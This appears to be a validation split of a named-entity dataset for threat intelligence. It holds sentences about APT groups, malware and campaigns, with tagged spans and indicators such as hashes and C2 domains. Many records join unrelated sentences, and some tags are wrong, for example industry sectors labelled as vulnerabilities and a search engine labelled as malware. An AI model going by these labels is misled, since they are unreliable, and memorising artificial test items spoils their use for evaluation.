The download name was \" Zawgyi_Keyboard_L.zip \" , and it dropped a \" setup.exe \" that contained several backdoor components , including an Elise \" wincex.dll \" ( a42c966e26f3577534d03248551232f3 , detected as Backdoor.Win32.Agent.delp ) . Rather than removing anything , it disables the malicious code by setting the following registry value to 1: HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ImageFlag . “ Who or what is asdfdfsda@asdf.com ? , ” Biderman asked , after being sent a list of nine email addresses .", "spans": {"System: Windows Defender ATP": [[20, 40]], "System: Windows": [[127, 134]], "Malware: Zawgyi_Keyboard_L.zip": [[170, 191]], "Malware: setup.exe": [[215, 224]], "Malware: wincex.dll": [[293, 303]], "Organization: asdfdfsda@asdf.com": [[570, 588]], "Organization: Biderman": [[595, 603]]}, "info": {"id": "cyberner_stix_valid_000683", "source": "cyberner_stix_valid"}} {"text": "The malicious documents seen in recent activity refer to a number of topics , including recent military promotions within the Pakistan Army , information related to the Pakistan Atomic Energy Commission , as well as Pakistan 's Ministry of the Interior . 
Contextually relevant emails are sent to specific targets with attached documents that are packed with exploit code and Trojan horse programmes designed to take advantage of vulnerabilities in software installed on the target 's computer .", "spans": {"Malware: malicious documents": [[4, 23]], "Organization: Pakistan Army": [[126, 139]], "Indicator: documents": [[327, 336]], "Vulnerability: exploit": [[358, 365]], "Malware: Trojan": [[375, 381]]}, "info": {"id": "cyberner_stix_valid_000684", "source": "cyberner_stix_valid"}} {"text": "Sofacy Uses DealersChoice to Target European Government Agency .", "spans": {}, "info": {"id": "cyberner_stix_valid_000685", "source": "cyberner_stix_valid"}} {"text": "Cobalt Strike C2 server : svchosts.com , svrhosts.com .", "spans": {"Indicator: svchosts.com": [[26, 38]], "Indicator: svrhosts.com": [[41, 53]]}, "info": {"id": "cyberner_stix_valid_000686", "source": "cyberner_stix_valid"}} {"text": "The EternalBlue exploit from the framework received worldwide attention after being used in the ransomware campaigns WannaCry in May and Petya / NotPetya in June 2017 . WhiteBear is a parallel project or second stage of the Skipper Turla cluster of activity documented in another private intelligence report \" Skipper Turla – the White Atlas framework \" from mid-2016 .", "spans": {"Vulnerability: EternalBlue exploit": [[4, 23]], "Malware: WhiteBear": [[169, 178]], "Malware: Skipper Turla": [[224, 237], [310, 323]], "Malware: White Atlas": [[330, 341]]}, "info": {"id": "cyberner_stix_valid_000687", "source": "cyberner_stix_valid"}} {"text": "If all conditions are met , “ Agent Smith ” tries to infect the application . Purportedly during one of the first attacks hackers intercepted the mailing list of the Anti-drop \" club and created a specific phishing email for its members . The installer uses two URLs to download malicious payloads . 
Over 5 years ago , we began tracking a new campaign that we called FakeUpdates ( also known as SocGholish ) that used compromised websites to trick users into running a fake browser update .", "spans": {"Malware: Agent Smith": [[30, 41]]}, "info": {"id": "cyberner_stix_valid_000688", "source": "cyberner_stix_valid"}} {"text": "We believe Suckfly specifically developed the back door for use in cyberespionage campaigns .", "spans": {}, "info": {"id": "cyberner_stix_valid_000689", "source": "cyberner_stix_valid"}} {"text": "Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors . The regsvr32.exe executable can be used to download a Windows Script Component file (SCT file) by passing the URL of the SCT file as an argument .", "spans": {"Organization: Users": [[0, 5]], "Indicator: regsvr32.exe": [[106, 118]], "System: Windows": [[156, 163]], "Indicator: SCT file": [[223, 231]]}, "info": {"id": "cyberner_stix_valid_000690", "source": "cyberner_stix_valid"}} {"text": "It does so for each and every app on the device as long as the package names are on its prey list . There are new TTPs used in this attack – for example Agent_Drable is leveraging the Django python framework for command and control infrastructure , the technical details of which are outlined later in the blog . The names are usually in a GUID format , although after we released our first round of Dexphot-blocking protections , the threat authors began to use random strings . 
Microsoft reported the exploitation occurred together and is linked to a single group of actors tracked as “ HAFNIUM ” , a group that has previously targeted the US - based defense companies , law firms , infectious disease researchers , and think tanks .", "spans": {"Organization: Microsoft": [[480, 489]], "Organization: US - based defense companies": [[642, 670]], "Organization: law firms": [[673, 682]], "Organization: infectious disease researchers": [[685, 715]], "Organization: think tanks": [[722, 733]]}, "info": {"id": "cyberner_stix_valid_000691", "source": "cyberner_stix_valid"}} {"text": "Artifact #2 was recovered from the Admin Controller operated by Die Linke .", "spans": {}, "info": {"id": "cyberner_stix_valid_000692", "source": "cyberner_stix_valid"}} {"text": "send funds via a wire transfer ) . After our analysis , we found that Proofpoint reported this malware as AndroMut as well . The campaign lasted from April to October and used job descriptions relevant to target organizations , in both English and Korean language .", "spans": {"Organization: we": [[56, 58]], "Organization: Proofpoint": [[70, 80]]}, "info": {"id": "cyberner_stix_valid_000693", "source": "cyberner_stix_valid"}} {"text": "Blending in with legitimate traffic is a common tactic used by attackers to help fly under the radar . 
They then identify the Exchange server and attempt to install the OwaAuth web shell .", "spans": {"Malware: OwaAuth web shell": [[169, 186]]}, "info": {"id": "cyberner_stix_valid_000694", "source": "cyberner_stix_valid"}} {"text": "The IPacket , Serialization and Encryption framework code is shared between the client and the server , therefore we can use it with Reflection .", "spans": {}, "info": {"id": "cyberner_stix_valid_000695", "source": "cyberner_stix_valid"}} {"text": "Similarly , some of the hardcoded values that had remained unaltered in CosmicDuke samples for many years had been changed .", "spans": {"Malware: CosmicDuke": [[72, 82]]}, "info": {"id": "cyberner_stix_valid_000696", "source": "cyberner_stix_valid"}} {"text": "However , the group exercises restraint and defensive evasion tactics to minimize opportunities for network defenders to detect or investigate its activities .", "spans": {}, "info": {"id": "cyberner_stix_valid_000697", "source": "cyberner_stix_valid"}} {"text": "Most commonly , PowerShell is launched from a Microsoft Office document that uses a VBA macro to launch PowerShell to perform something malicious – typically downloading the “ real ” malware to run .", "spans": {}, "info": {"id": "cyberner_stix_valid_000698", "source": "cyberner_stix_valid"}} {"text": "In environments with a high risk of interception or intrusion , organizations should consider supplementing password authentication with other forms of authentication such as challenge/response or multifactor authentication using biometric or physical tokens .", "spans": {}, "info": {"id": "cyberner_stix_valid_000699", "source": "cyberner_stix_valid"}} {"text": "During these intrusions , LEAD 's objective was to steal sensitive data , including research materials , process documents , and project plans . 
The compile dates of the samples analyzed by CTU researchers are all later than the hard-coded August 8 , 2013 date , indicating that the code might be reused from previous tools .", "spans": {"Organization: CTU": [[190, 193]]}, "info": {"id": "cyberner_stix_valid_000700", "source": "cyberner_stix_valid"}} {"text": "] it Public Resume Confirms Development of Android Agent Additionally , an employee of eSurv quite precisely described their work in developing an \" agent to gather data from Android devices and send it to a C & C server '' as well as researching \" vulnerabilities in mobile devices ( mainly Android ) '' in a publicly available resume . XENOTIME operates globally , impacting regions far outside of the Middle East , their initial target . For example , in some instances the backdoor uploads screenshots taken from an infected machine , as can be seen in the example below . RA Group , in its ongoing campaigns , has targeted the U.S. , South Korea , Taiwan , the U.K. and India across several business verticals , including manufacturing , wealth management , insurance providers , pharmaceuticals and financial management consulting companies .", "spans": {"System: Android": [[43, 50], [175, 182], [292, 299]], "Organization: eSurv": [[87, 92]], "Malware: backdoor": [[477, 485]], "Organization: the U.S.": [[628, 636]], "Organization: South Korea": [[639, 650]], "Organization: Taiwan": [[653, 659]], "Organization: U.K.": [[666, 670]], "Organization: India": [[675, 680]], "Vulnerability: business verticals": [[696, 714]], "Vulnerability: manufacturing": [[727, 740]], "Vulnerability: wealth management": [[743, 760]], "Vulnerability: insurance providers": [[763, 782]], "Vulnerability: pharmaceuticals and financial management consulting companies": [[785, 846]]}, "info": {"id": "cyberner_stix_valid_000701", "source": "cyberner_stix_valid"}} {"text": "For the 64-bit stage 2 malware , the code execution is transferred from the loader using a well-known technique 
called Heaven ’ s Gate . The SHAPESHIFT wiper is capable of wiping disks and volumes , as well as deleting files . The payload is encoded inside a separate .png file using a technique called steganography . After further research , we were able to link Hack520 to different network administration activities , notably with a Virtual Private Server ( VPS ) hosting service .", "spans": {"System: Virtual Private Server ( VPS ) hosting service": [[437, 483]]}, "info": {"id": "cyberner_stix_valid_000702", "source": "cyberner_stix_valid"}} {"text": "HAMMERDUKE : First known activity January 2015 , Most recent known activity Summer 2015 , Other names HAMMERTOSS , Netduke , C&C communication methods HTTP(S) , Twitter , Known toolset components Backdoor .", "spans": {"Malware: HAMMERDUKE": [[0, 10]], "Malware: HAMMERTOSS": [[102, 112]], "Malware: Netduke": [[115, 122]]}, "info": {"id": "cyberner_stix_valid_000703", "source": "cyberner_stix_valid"}} {"text": "A possible attack scenario involves replacing legitimate apps with repackaged or malicious versions . Either way , the group's consistent activity throughout central and eastern asia seems to be poorly represented in the public discussion . All these information are automatically loaded by the RMS executable and firstly stored in the registry key “ HKCU\\Software\\tektonik\\Remote MANIPULATOR System\\Host\\parameters ” .", "spans": {}, "info": {"id": "cyberner_stix_valid_000704", "source": "cyberner_stix_valid"}} {"text": "The said technique brings the advantage of avoiding auto-start extensibility points ( ASEP ) scanners and programs that checks for binaries installed as service ( for the latter , the service chosen by FinFisher will show up as a clean Windows signed binary ) . The persistent use of social media to identify and manipulate victims indicates that COBALT GYPSY successfully achieves its objectives using this tactic . 
If the parent name matches , the malware will traverse the stack in order to find a return address that falls into the memory of the parent process’s text section . A Systemd service unit allows for a program to be run under certain conditions , and in this case , it was used to execute the GOGETTER binary on reboot .", "spans": {"Malware: FinFisher": [[202, 211]], "System: Windows": [[236, 243]], "Organization: social media": [[284, 296]], "Malware: GOGETTER binary on reboot": [[709, 734]]}, "info": {"id": "cyberner_stix_valid_000705", "source": "cyberner_stix_valid"}} {"text": "All data is transmitted in JSON format ( after decryption ) . TG-3390 actors have used Java exploits in their SWCs . This allows the malicious activity to evade detection . The victims have been in the Americas , EMEA , and APJ as of writing .", "spans": {"Vulnerability: Java exploits": [[87, 100]]}, "info": {"id": "cyberner_stix_valid_000706", "source": "cyberner_stix_valid"}} {"text": "The second campaign identifier , which we suspect may be related , is “ mod_ge_2009_07_03 ” from a month later and apparently targeting the Ministry of Defense of Georgia .", "spans": {"Organization: Ministry of Defense": [[140, 159]]}, "info": {"id": "cyberner_stix_valid_000707", "source": "cyberner_stix_valid"}} {"text": "From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space . 
The initially-observed \" thanks.pps \" example tricks the user into running the embedded file named ins8376.exe which loads a payload DLL named mpro324.dll .", "spans": {"Vulnerability: Carbanak": [[10, 18]], "Organization: banks": [[55, 60]], "Organization: electronic payment": [[65, 83]], "Organization: space": [[125, 130]], "Indicator: thanks.pps": [[158, 168]], "Indicator: ins8376.exe": [[232, 243]], "Indicator: mpro324.dll": [[276, 287]]}, "info": {"id": "cyberner_stix_valid_000708", "source": "cyberner_stix_valid"}} {"text": "The threat actor made some modifications to the original source code of hTran . Since early 2013 , we have observed activity from a unique threat actor group , which we began to investigate based on increased activities against human right activists in the beginning of 2015 .", "spans": {"Organization: activists": [[240, 249]]}, "info": {"id": "cyberner_stix_valid_000709", "source": "cyberner_stix_valid"}} {"text": "] cc/TiktokPro . Gamaredon Group is an alleged Russian threat group . Unlike standard Azazel which is configured to hide network activity based on port ranges , the Winnti modified version keeps a list of process identifiers and network connections associated with the malware ’s activity .", "spans": {"Malware: Winnti": [[165, 171]]}, "info": {"id": "cyberner_stix_valid_000710", "source": "cyberner_stix_valid"}} {"text": "FireEye has not identified APT33 using SHAPESHIFT , but APT33 is the only group FireEye has seen to use DROPSHOT . 
As the CnC server , Silence use CnC-3 server running Windows , from which they send commands to download additional modules .", "spans": {"Organization: FireEye": [[0, 7], [80, 87]], "Malware: CnC-3 server": [[147, 159]], "System: Windows": [[168, 175]]}, "info": {"id": "cyberner_stix_valid_000711", "source": "cyberner_stix_valid"}} {"text": "The activity discussed in this blog revolves around two of the multitude of weaponized documents that we collected .", "spans": {}, "info": {"id": "cyberner_stix_valid_000712", "source": "cyberner_stix_valid"}} {"text": "URI TERROR ATTACK & KASHMIR PROTEST THEMED SPEAR PHISHING emails TARGETING INDIAN EMBASSIES AND INDIAN MINISTRY OF EXTERNAL AFFAIRS - CYSINFO .", "spans": {"Organization: INDIAN EMBASSIES": [[75, 91]], "Organization: INDIAN MINISTRY OF EXTERNAL AFFAIRS": [[96, 131]]}, "info": {"id": "cyberner_stix_valid_000713", "source": "cyberner_stix_valid"}} {"text": "In this blog we provide insight into the tactics , techniques and procedures (TTPs) of a Brazilian cyber crime group that specializes in payment card fraud operations . On November 10 , 2015 , threat actors sent a spear-phishing email to an individual at the French Ministry of Foreign Affairs .", "spans": {"Organization: individual": [[241, 251]]}, "info": {"id": "cyberner_stix_valid_000714", "source": "cyberner_stix_valid"}} {"text": "This means the attackers can steal the victim ’ s credentials for logging into apps , SMS and email messages , displayed cryptocurrency private keys , and even software-generated 2FA codes . It later delivered an information stealer named EmailStealer , ” which stolesimple mail transfer protocol (SMTP) credentials and email addresses in the victim’s machine . 
While some members within the Romeo and Sierra groups may not implement sound authentication strategies , shift their design focus in abrupt and unusual manners , and fail to understand the pitfalls of distributed command networks , on the whole the families within the Lazarus Group 's collection of RATs and staging malware perform their tasks with surprising effectiveness .", "spans": {"Malware: RATs": [[663, 667]], "Malware: staging": [[672, 679]], "Malware: malware": [[680, 687]]}, "info": {"id": "cyberner_stix_valid_000715", "source": "cyberner_stix_valid"}} {"text": "We are actively researching and will update this blog in the event we discover the malicious Flash object and payload delivered in this attack .", "spans": {}, "info": {"id": "cyberner_stix_valid_000716", "source": "cyberner_stix_valid"}} {"text": "Kaspersky Lab mobile products prevented 2,500 infections by banking Trojans . In early August , Unit 42 identified two attacks using similar techniques . In addition to ShadowPad , the Winnti malware was found on some machines at these two universities at the end of October ( i.e . two weeks before ShadowPad ) in the file C:\\Windows\\System32\\oci.dll and is detected by ESET products as Win64/Winnti.CA . Organizations evaluating their security posture and developing a risk based security framework would be well served to consider the various potential motivational related threats .", "spans": {"System: Kaspersky Lab": [[0, 13]], "Organization: Unit 42": [[96, 103]], "Malware: ShadowPad": [[169, 178], [300, 309]], "Malware: Winnti": [[185, 191]], "Indicator: C:\\Windows\\System32\\oci.dll": [[324, 351]], "Organization: ESET": [[371, 375]], "Organization: Organizations": [[406, 419]]}, "info": {"id": "cyberner_stix_valid_000717", "source": "cyberner_stix_valid"}} {"text": "The malware creates an Intent inside the decryption function using the string value passed as the name for the Intent . 
During our brief window of visibility into one of the known 22 CnC nodes , FireEye observed the Ke3chang conducting reconnaissance and moving laterally throughout the compromised networks . The ZIP file had a file size significantly greater than that of its uncompressed . These threats can come from internal employees , vendors , a contractor or a partnerand are viewed as some of the greatest cyber security threats to organizations .", "spans": {"Organization: FireEye": [[195, 202]], "Organization: internal employees": [[421, 439]], "Organization: vendors": [[442, 449]], "Organization: contractor": [[454, 464]], "Organization: partnerand": [[470, 480]], "Organization: organizations": [[542, 555]]}, "info": {"id": "cyberner_stix_valid_000718", "source": "cyberner_stix_valid"}} {"text": "The \" source process '' refers to the Zen trojan running as root , while the \" target process '' refers to the process to which the code is injected and [ pid ] refers to the target process pid value . We found that the group behind this campaign targeted mainly industrial , engineering and manufacturing organizations in more than 30 countries . APT17 went further to obfuscate their C2 IP address and employed a multi-layered approach for the malware to finally beacon the true C2 IP . These accounts were created by MiniDuke - s Command and Control ( C2 ) operators and the tweets maintain specific tags labeling encrypted URLs for the backdoors .", "spans": {"Malware: Zen": [[38, 41]], "Organization: industrial": [[263, 273]], "Organization: engineering": [[276, 287]], "Organization: manufacturing organizations": [[292, 319]]}, "info": {"id": "cyberner_stix_valid_000719", "source": "cyberner_stix_valid"}} {"text": "Figure 5 . We believe APT34 is involved in a long-term cyber espionage operation largely focused on reconnaissance efforts to benefit Iranian nation-state interests and has been operational since at least 2014 . 
JhoneRAT is developed in python but not based on public source code , as it is often the case for this type of malware . In that campaign , the attackers also targeted the government of a Middle Eastern country , a multinational electronics manufacturer , and a hospital in Southeast Asia .", "spans": {"Malware: JhoneRAT": [[212, 220]], "Organization: government of a Middle Eastern country": [[384, 422]], "Organization: multinational electronics manufacturer": [[427, 465]], "Organization: hospital in Southeast Asia": [[474, 500]]}, "info": {"id": "cyberner_stix_valid_000720", "source": "cyberner_stix_valid"}} {"text": "Leafminer also utilized Process Doppelganging , a detection evasion technique first discussed at the Black Hat EU conference last year . The pop-out window is just smoke and mirrors , where nothing actually happens once the countdown timer reaches zero .", "spans": {}, "info": {"id": "cyberner_stix_valid_000721", "source": "cyberner_stix_valid"}} {"text": "If Google Play Protect detects one of these apps , Google Play Protect will show a warning to users . The first new connection SPEAR identified was derived from an email address listed in Blue Coat Systems' original report on PassCV . The threat actors then installed the hcdLoader RAT , which installs as a Windows service and provides command line access to the compromised system . That DLL file is the main module of Miniduke , and it uses the URL http://twitter.com/TamicaCGerald to fetch commands .", "spans": {"System: Google Play Protect": [[3, 22], [51, 70]], "Organization: SPEAR": [[127, 132]], "Malware: hcdLoader": [[272, 281]], "System: Windows": [[308, 315]]}, "info": {"id": "cyberner_stix_valid_000722", "source": "cyberner_stix_valid"}} {"text": "Once installed , HenBox steals information from the devices from a myriad of sources , including many mainstream chat , communication , and social media apps . 
The dropper first appeared in mid-July , suggesting that this APT activity is potentially ongoing , with Turla actively targeting G20 participants and/or those with interest in the G20 , including member nations , journalists , and policymakers . According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL .", "spans": {"Malware: HenBox": [[17, 23]], "Organization: G20": [[290, 293]], "Organization: FireEye": [[420, 427]], "Vulnerability: exploit": [[503, 510]], "Organization: Microsoft Office": [[511, 527]], "Vulnerability: vulnerabilities": [[528, 543]], "Malware: LOWBALL": [[594, 601]]}, "info": {"id": "cyberner_stix_valid_000723", "source": "cyberner_stix_valid"}} {"text": "] com hxxp : //mailsa-qaw [ . Our investigation of APT28 's compromise of WADA 's network , and our observations of the surrounding events reveal how Russia sought to counteract a damaging narrative and delegitimize the institutions leveling criticism . Glimpse added the ability to use an alternate DNS resource record type (TXT) as opposed to solely relying on A resource records for DNS . None Deploy advanced endpoint detection and response ( EDR ) tools to all endpoints to detect web services spawning PowerShell or command line processes .", "spans": {"Malware: Glimpse": [[254, 261]]}, "info": {"id": "cyberner_stix_valid_000724", "source": "cyberner_stix_valid"}} {"text": "Nonetheless , these spam emails were not delivered to the UAE or Arabic-speaking users , but to banks in Asian countries such as India , Indonesia , and the Philippines . 
The self-extracting RAR writes a legitimate executable , an actor-created DLL called Loader.dll and a file named readme.txt to the filesystem and then executes the legitimate executable .", "spans": {"Malware: spam emails": [[20, 31]], "Organization: banks": [[96, 101]], "Malware: self-extracting RAR": [[175, 194]], "Indicator: Loader.dll": [[256, 266]], "Indicator: readme.txt": [[284, 294]]}, "info": {"id": "cyberner_stix_valid_000725", "source": "cyberner_stix_valid"}} {"text": "Attacks launched by Scarlet Mimic were publicly exposed on 2013 in a Trend Micro report about the FakeM Trojan . The tool does all that a typical Trojan needs to accomplish: upload , download and execute files , fingerprint target systems .", "spans": {"Organization: Trend Micro": [[69, 80]], "Indicator: Trojan": [[146, 152]]}, "info": {"id": "cyberner_stix_valid_000726", "source": "cyberner_stix_valid"}} {"text": "Dragos has reported that XENOTIME , the APT group behind the TRISIS (aka TRITON and HatMan) attack on a Saudi Arabian petro-chemical facility in 2017 , has expanded its focus beyond the oil and gas industries . According to Kessem the malware has redirection instructions for 17 banks , and features an additional 230 URLs to assist attackers in targeting community banks and email service providers in Poland .", "spans": {"Organization: Dragos": [[0, 6]], "Organization: oil": [[186, 189]], "Organization: gas industries": [[194, 208]], "Organization: Kessem": [[224, 230]], "Organization: banks": [[279, 284]], "Organization: community banks": [[356, 371]], "Organization: email service providers": [[376, 399]]}, "info": {"id": "cyberner_stix_valid_000727", "source": "cyberner_stix_valid"}} {"text": "he Tibetan community has been targeted for over a decade by espionage operations that use malware to infiltrate communications and gather information . 
After compromising an initial victim 's system ( patient 0 ) , the threat actors use the Baidu search engine to search for the victim 's organization name .", "spans": {"Organization: Tibetan community": [[3, 20]], "Malware: Baidu search engine": [[241, 260]]}, "info": {"id": "cyberner_stix_valid_000728", "source": "cyberner_stix_valid"}} {"text": "As already stated in the ‘ malware features ’ part , there are multiple giveaways in the code . This post was our first analysis of the first Panda Banker campaign that we’ve seen to target financial institutions in Japan . In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television .", "spans": {"Malware: Panda Banker": [[142, 154]], "Organization: financial institutions": [[190, 212]], "Organization: media organizations": [[313, 332]]}, "info": {"id": "cyberner_stix_valid_000729", "source": "cyberner_stix_valid"}} {"text": "Of these , the campaign with the identifier “ kaz_2010_07_30 ” , which possibly targeted Kazakhstan , is of note because it is the last PinchDuke campaign we have observed .", "spans": {"Malware: PinchDuke": [[136, 145]]}, "info": {"id": "cyberner_stix_valid_000730", "source": "cyberner_stix_valid"}} {"text": "To sum up , the HBO hacker - Behzad Mesri is a member of Turk Black Hat along with ArYaIeIrAn , who provides infrastructure for Charming Kitten activity via PersianDNS / Mahanserver together with Mohammad Rasoul Akbari , who is a Facebook friend of Behzad Mesri 's . 
As part of their social engineering ploy , the Taidoor attackers attach a decoy document to their emails that , when opened , displays the contents of a legitimate document but executes a malicious payload in the background .", "spans": {"Organization: Facebook": [[230, 238]], "Organization: social engineering": [[284, 302]]}, "info": {"id": "cyberner_stix_valid_000731", "source": "cyberner_stix_valid"}} {"text": "Indicators of Compromise ( IoCs ) SHA256 Detection e394e53e53cd9047d6cff184ac333ef7698a34b777ae3aac82c2c669ef661dfe AndroidOS_SpyAgent.HRXB e8d4713e43241ab09d40c2ae8814302f77de76650ccf3e7db83b3ac8ad41f9fa AndroidOS_ProjectSpy.HRX 29b0d86ae68d83f9578c3f36041df943195bc55a7f3f1d45a9c23f145d75af9d The GCMAN group has moved beyond banks and is now targeting the budgeting and accounting departments in any organization of interest to them , using the same APT-style tools and techniques . . On April 16 , 2022 , KillNet dedicated its attack on a U.S. energy company to REvil .", "spans": {"Organization: banks": [[328, 333]], "Organization: budgeting": [[359, 368]], "Organization: accounting departments": [[373, 395]], "Organization: U.S. energy company": [[543, 562]]}, "info": {"id": "cyberner_stix_valid_000732", "source": "cyberner_stix_valid"}} {"text": "cv.doc : f4d18316e367a80e1005f38445421b1f . cv_itworx.doc : 45b0e5a457222455384713905f886bd4 . cv_mci.doc : f4d18316e367a80e1005f38445421b1f . 
discount_voucher_codes.xlsm : 19cea065aa033f5bcfa94a583ae59c08 .", "spans": {"Indicator: cv.doc": [[0, 6]], "Indicator: f4d18316e367a80e1005f38445421b1f": [[9, 41], [108, 140]], "Indicator: cv_itworx.doc": [[44, 57]], "Indicator: 45b0e5a457222455384713905f886bd4": [[60, 92]], "Indicator: cv_mci.doc": [[95, 105]], "Indicator: discount_voucher_codes.xlsm": [[143, 170]], "Indicator: 19cea065aa033f5bcfa94a583ae59c08": [[173, 205]]}, "info": {"id": "cyberner_stix_valid_000733", "source": "cyberner_stix_valid"}} {"text": "Back then it was detected as Trojan-Spy.AndroidOS.SmsThief , but later versions were assigned to another family – Trojan-Banker.AndroidOS.Rotexy . In fact , REDBALDKNIGHT has been targeting Japan as early as 2008 , based on the file properties of the decoy documents they've been sending to their targets . DHS and FBI are distributing this MAR to enable network defense and reduce exposure to North Korean government malicious cyber activity .", "spans": {"Malware: Trojan-Spy.AndroidOS.SmsThief": [[29, 58]], "Malware: Trojan-Banker.AndroidOS.Rotexy": [[114, 144]], "Malware: decoy documents": [[251, 266]], "Organization: DHS": [[307, 310]], "Organization: FBI": [[315, 318]]}, "info": {"id": "cyberner_stix_valid_000734", "source": "cyberner_stix_valid"}} {"text": "Figure 1 shows the infection rate for each of the targets .", "spans": {}, "info": {"id": "cyberner_stix_valid_000735", "source": "cyberner_stix_valid"}} {"text": "We classify this 40-month period into three main stages . This function is similar to the various versions of backdoors ( such as sctrls and sip_telephone ) that we analyzed in our previous blog post and whitepaper . Dexphot is not the type of attack that generates mainstream media attention ; it ’s one of the countless malware campaigns that are active at any given time . 
• Use of additional offensive security tools Covenant , Nishang , and PowerCat for remote access .", "spans": {"Malware: Dexphot": [[217, 224]]}, "info": {"id": "cyberner_stix_valid_000736", "source": "cyberner_stix_valid"}} {"text": "The group uses legitimate administration tools to fly under the radar in their post-exploitation phase , which makes detection of malicious activity , as well as attribution more complicated . Attackers using several locations in China have leveraged C&C servers on purchased hosted services in the United States and compromised servers in the Netherlands to wage attacks against global oil , gas , and petrochemical companies , as well as individuals and executives in Kazakhstan , Taiwan , Greece , and the United States to acquire proprietary and highly confidential information .", "spans": {"Organization: oil": [[387, 390]], "Organization: gas": [[393, 396]], "Organization: petrochemical companies": [[403, 426]], "Organization: executives": [[456, 466]]}, "info": {"id": "cyberner_stix_valid_000737", "source": "cyberner_stix_valid"}} {"text": "Also , the NCSC advisory mentioned that the actors used a file name stylecss.aspx for their webshell , which is the same filename we saw associated with China Chopper . Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 .", "spans": {"Malware: stylecss.aspx": [[68, 81]], "Malware: China Chopper": [[153, 166]], "Indicator: malicious.DOC": [[255, 268]], "Vulnerability: exploit": [[278, 285]], "Organization: Microsoft": [[288, 297]], "Vulnerability: vulnerability": [[314, 327]], "Vulnerability: CVE-2012-0158": [[330, 343]]}, "info": {"id": "cyberner_stix_valid_000738", "source": "cyberner_stix_valid"}} {"text": "“ Agent Smith ” currently uses its broad access to the device ’ s resources to show fraudulent ads for financial gain . 
The developers designed Bookworm to be a modular Trojan not limited to just the initial architecture of the Trojan , as Bookworm can also load additional modules provided by the C2 server . It ’s unclear whether the hackers are purchasing the exploits and spyware together , directly from Gamma Group , or if they were able to acquire some of the tools through other avenues . “ BlackOasis ’ interests span a wide gamut of figures involved in Middle Eastern politics and verticals disproportionately relevant to the region . MoonWind communicates over ports 80 , 443 , 53 , and 8080 via raw sockets instead of the protocols usually associated with the ports.[25 ] njRAT has used port 1177 for HTTP C2 communications.[26 ] During Operation Wocao , the threat actors used uncommon high ports for its backdoor C2 , including ports 25667 and 47000.[27 ]", "spans": {"Malware: Agent Smith": [[2, 13]], "Malware: spyware": [[376, 383]], "Malware: MoonWind": [[645, 653]], "Malware: njRAT": [[784, 789]], "System: HTTP C2 communications.[26": [[813, 839]], "System: backdoor C2": [[918, 929]]}, "info": {"id": "cyberner_stix_valid_000739", "source": "cyberner_stix_valid"}} {"text": "Facebook profile of the C & C domain registrar ( cover picture and profile picture edited out ) Linked on the malicious developer ’ s Facebook profile , we discovered a Facebook page , Minigameshouse , and an associated domain , minigameshouse [ . Upon execution , it will communicate with an attacker-controller website to download a variant of the Pony malware , pm.dll” along with a standard Vawtrak trojan . 
SHA256 : 39bc918f0080603ac80fe1ec2edfd3099a88dc04322106735bc08188838b2635 .", "spans": {"Organization: Facebook": [[0, 8], [134, 142], [169, 177]], "Malware: Pony malware": [[350, 362]], "Malware: pm.dll”": [[365, 372]], "Indicator: 39bc918f0080603ac80fe1ec2edfd3099a88dc04322106735bc08188838b2635": [[421, 485]]}, "info": {"id": "cyberner_stix_valid_000740", "source": "cyberner_stix_valid"}} {"text": "Messages sent from ORat to its command and control ( C2 ) server start with the string \"VIEWS0018x\" .", "spans": {"Malware: ORat": [[19, 23]]}, "info": {"id": "cyberner_stix_valid_000741", "source": "cyberner_stix_valid"}} {"text": "Once granted permission , it hides its icon from the launcher application list then starts a service that it keeps running in the background . Spear phishing emails with vulnerable Office documents or malicious macros are sent to victims . These parameters are needed to self-decrypt the “ uninstall.exe ” file which is again another SFX archive .", "spans": {"Indicator: uninstall.exe": [[290, 303]]}, "info": {"id": "cyberner_stix_valid_000742", "source": "cyberner_stix_valid"}} {"text": "It impersonates a porn player app or MMS application but without having their functionality . By all accounts , late 2015 was the beginning of BEC for Scattered Canary . 
This recent attack against an online casino in Central America suggests that hacking tools from the Lazarus toolset are recompiled with every attack ( we didn't see these exact samples anywhere else ) .", "spans": {}, "info": {"id": "cyberner_stix_valid_000743", "source": "cyberner_stix_valid"}} {"text": "These routines are indicative of the group ’s aim to get quantitative returns through varied cybercriminal profit streams .", "spans": {}, "info": {"id": "cyberner_stix_valid_000744", "source": "cyberner_stix_valid"}} {"text": "We therefore believe that the Dukes group simply failed to update the computer they were using to compile GeminiDuke samples , so that the timestamps seen in later samples still appear to follow the old definition of Moscow Standard Time .", "spans": {"Malware: GeminiDuke": [[106, 116]]}, "info": {"id": "cyberner_stix_valid_000745", "source": "cyberner_stix_valid"}} {"text": "The past iteration of SLUB spread from a unique watering hole website exploiting CVE-2018-8174 , a VBScript engine vulnerability . Careto 's Mask campaign we discovered relies on spear-phishing e-mails with links to a malicious website .", "spans": {"Vulnerability: CVE-2018-8174": [[81, 94]], "Indicator: Careto": [[131, 137]]}, "info": {"id": "cyberner_stix_valid_000746", "source": "cyberner_stix_valid"}} {"text": "According to trusted third-party reporting , HIDDEN COBRA actors have likely been using FALLCHILL malware since 2016 to target the aerospace , telecommunications , and finance industries . Palo Alto Networks has noted and described the differences of two malware agents developed in parallel , with commonalities in behavior but differing functionalities ; families described as Infy and Infy M. 
